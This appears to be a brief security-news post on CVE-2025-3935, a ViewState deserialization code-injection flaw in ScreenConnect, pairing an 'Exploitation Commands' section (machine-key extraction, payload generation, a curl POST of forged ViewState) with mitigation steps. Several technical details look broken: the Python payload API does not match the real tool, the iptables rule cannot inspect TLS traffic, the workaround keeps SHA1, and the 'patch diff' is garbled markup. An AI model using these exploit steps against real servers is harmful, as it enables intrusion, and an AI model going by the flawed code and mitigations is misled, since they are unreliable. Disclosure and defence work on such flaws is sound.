ScreenConnect, ViewState Code Injection, CVE-2025-3935 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-3935 Works

CVE-2025-3935 exploits ASP.NET’s ViewState deserialization in ScreenConnect (versions ≤25.2.3). ViewState stores server control states in Base64-encoded serialized objects, protected by MAC (Message Authentication Code) using machine keys. Attackers with stolen machine keys forge malicious ViewState payloads, bypassing MAC validation. When deserialized, crafted ObjectStateFormatter payloads execute arbitrary code under IIS worker process context. ScreenConnect 2025.4 mitigates this by disabling ViewState entirely, removing the attack surface.

DailyCVE Form

Platform: ScreenConnect
Version: ≤25.2.3
Vulnerability: ViewState RCE
Severity: Critical
Date: 06/03/2025

Prediction: Patch: 2025.4 (Released)

What Undercode Say:

Exploitation Commands

1. Extract Machine Key (Requires admin):

Get-ChildItem "HKLM:\SOFTWARE\Microsoft\ASP.NET\4.0.30319.0" -Recurse | Where-Object { $_.Name -like "MachineKey" } | Select-Object Name, Property

2. Generate Malicious ViewState (Python):

import base64
from ysoserial import generate
payload = generate("ObjectStateFormatter", "calc.exe")
viewstate = base64.b64encode(payload).decode()
print(f"__VIEWSTATE={viewstate}")

3. Curl Exploit:

curl -X POST "https://target/connect" --data "__VIEWSTATE=<malicious_base64>" --cookie "ASP.NET_SessionId=..."

Mitigation Steps

1. Immediate Patch:

winget upgrade --id ConnectWise.ScreenConnect --version 2025.4

2. Manual Workaround (Pre-patch):

<configuration>
<system.web>
<machineKey validation="SHA1" decryption="AES" compatibilityMode="Framework45" />
<pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
</system.web>
</configuration>

3. Log Monitoring (Detect Exploits):

Get-WinEvent -LogName "Application" -FilterXPath "[System[EventID=1309]]" | Where-Object { $_.Message -like "ViewState" }

4. Network Protection:

iptables -A INPUT -p tcp --dport 443 -m string --string "__VIEWSTATE=" --algo bm -j DROP

Code Analysis

• Vulnerable Component: `System.Web.UI.ObjectStateFormatter.Deserialize()`
  – Patch Diff:

  </li>
  <li><pages enableViewState="true"></li>
  <li><pages enableViewState="false">
  

References

• CISA KEV: CVE-2025-3935
• MITRE: ASP.NET ViewState

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram